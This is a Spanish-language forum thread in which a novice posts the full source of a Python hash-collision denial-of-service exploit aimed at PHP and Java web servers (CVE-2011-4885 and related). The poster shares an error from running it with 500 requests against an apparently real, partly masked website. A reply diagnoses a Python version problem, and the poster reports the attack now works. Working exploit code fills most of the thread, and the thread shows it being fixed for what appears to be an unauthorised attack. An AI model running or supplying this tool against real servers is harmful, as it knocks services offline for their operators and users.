Hola este es el code de un exploit pero no encuentro el error es q en python y en general soy noob xD#! /usr/bin/env python
"""
This script was written by Christian Mehlmauer <FireFart@gmail.com>
https://twitter.com/#!/_FireFart_
Sourcecode online at:
https://github.com/FireFart/HashCollision-DOS-POC
Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
http://www.ocert.org/advisories/ocert-2011-003.html
CVE:
Apache Geronimo: CVE-2011-5034
Oracle Glassfish: CVE-2011-5035
PHP: CVE-2011-4885
Apache Tomcat: CVE-2011-4858
requires Python 2.7
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a PHP server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP
-) Take down a JAVA server(make 500 requests without waiting for a response, maximum POST data size 2MB):
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2
Changelog:
v6.0: Added Javapayloadgenerator
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
class Payloadgenerator:
# Maximum recursions when searching for collisionchars
_recursivemax = 15
_recursivecounter = 1
def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8):
self._verbose = verbose
self._collisionchars = collisionchars
self._collisioncharlength = collisioncharlength
self._payloadlength = payloadlength
def generateASPPayload(self):
raise Exception("ASP Payload not implemented")
def generateJAVAPayload(self):
a = self._computeJAVACollisionChars(self._collisionchars)
return self._generatePayload(a, self._payloadlength)
def generatePHPPayload(self):
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# compute entries with collisions in PHP hashtable hash function
a = self._computePHPCollisionChars(self._collisionchars)
return self._generatePayload(a, self._payloadlength);
def _computePHPCollisionChars(self, count):
charrange = range(0, 256)
return self._computeCollisionChars(self._DJBX33A, count, charrange)
def _computeJAVACollisionChars(self, count):
charrange = range(0, 129)
return self._computeCollisionChars(self._DJBX31A, count, charrange)
def _computeCollisionChars(self, function, count, charrange):
hashes = {}
counter = 0
length = self._collisioncharlength
a = ""
for i in charrange:
a = a+chr(i)
source = list(itertools.product(a, repeat=length))
basestr = ''.join(random.choice(source))
basehash = function(basestr)
hashes[str(counter)] = basestr
counter = counter + 1
for item in source:
tempstr = ''.join(item)
if tempstr == basestr:
continue
if function(tempstr) == basehash:
hashes[str(counter)] = tempstr
counter = counter + 1
if counter >= count:
break;
if counter < count:
# Try it again
if self._recursivecounter > self._recursivemax:
print("Not enought values found. Please start this script again")
sys.exit(1)
print("%d: Not enough values found. Trying it again..." % self._recursivecounter)
self._recursivecounter = self._recursivecounter + 1
hashes = self._computeCollisionChars(function, count, charrange)
else:
if self._verbose:
print("Found values:")
for item in hashes:
tempstr = hashes[item]
print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr)))
for i in tempstr:
print("\t\tValue: %s\tCharcode: %d" % (i, ord(i)))
return hashes
def _DJBXA(self, inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
#PHP
def _DJBX33A(self, inputstring):
return self._DJBXA(inputstring, 33, 5381)
#Java
def _DJBX31A(self, inputstring):
return self._DJBXA(inputstring, 31, 0)
#ASP
def _DJBX33X(self, inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
def _generatePayload(self, collisionchars, payloadlength):
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# how long should the payload be
length = payloadlength
size = len(collisionchars)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = self._base_convert(i, size)
result = inputstring.rjust(length, "0")
for item in collisionchars:
result = result.replace(str(item), collisionchars[item])
post += urllib.urlencode({result:""}) + "&"
return post;
def _base_convert(self, num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def main():
parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
parser.add_argument("--version", action="version", version="%(prog)s 6.0")
options = parser.parse_args()
if options.target == "PHP":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 8
else:
maxpayloadsize = options.maxpayloadsize
elif options.target == "ASP":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 8
else:
maxpayloadsize = options.maxpayloadsize
elif options.target == "JAVA":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 2
else:
maxpayloadsize = options.maxpayloadsize
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
# Number of colliding chars to find
collisionchars = 5
# Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
collisioncharlength = 2
# Length of each parameter in the payload
payloadlength = 8
generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
if options.target == "PHP":
payload = generator.generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
payload = generator.generateJAVAPayload()
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = maxpayloadsize*1024*1024
payload = payload[:maxinmb]
# remove last invalid(cut off) parameter
position = payload.rfind("=&")
payload = payload[:position+1]
# Save payload
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
# User selected to only generate the payload
if options.generate:
return
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https"
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
if __name__ == "__main__":
main()este es el error q me teria cuando lo ejecutoCitarC:\Users\c****\Desktop>exp.py -u http://www.me******.com -v -c 500 -t php
Traceback (most recent call last):
File "C:\Users\c****\Desktop\exp.py", line 359, in <module>
main()
File "C:\Users\c****n\Desktop\exp.py", line 216, in main
url = urlparse.urlparse(options.url)
NameError: global name 'urlparse' is not defined
les agradezco su colaboración
Tiene pinta de que has instalado mal Python, porque urlparse es de la a`pi core y veo que la estas importando, que versión de python usas?
Lo otro es, para compilar y ejecutar el exploit, se necesita alguna dependencia? a lo mejor desde el sitio donde lo has descargado encuentras que librerias necesitas y puede ser que alguna no la tengas instalada, (openssl, por ejemplo).
Si no es un problema de la instalación de python es un problema de dependencias.
se tenias toda la razón tenia la versión 3.2 e instale la versión 2.7 de phyton y ya funciono xD grax